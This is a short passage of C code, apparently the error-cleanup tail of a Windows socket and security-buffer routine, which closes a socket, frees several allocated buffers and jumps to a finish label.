if (INVALID_SOCKET != nSocket)
{
closesocket(nSocket);
}
if (WrapBuffers[0].pvBuffer)
{
free(WrapBuffers[0].pvBuffer);
}
if (WrapBuffers[1].pvBuffer)
{
free(WrapBuffers[1].pvBuffer);
}
if (WrapBuffers[2].pvBuffer)
{
free(WrapBuffers[2].pvBuffer);
}
if (OutBuffer.pvBuffer)
{
free(OutBuffer.pvBuffer);
}
goto finish;
}
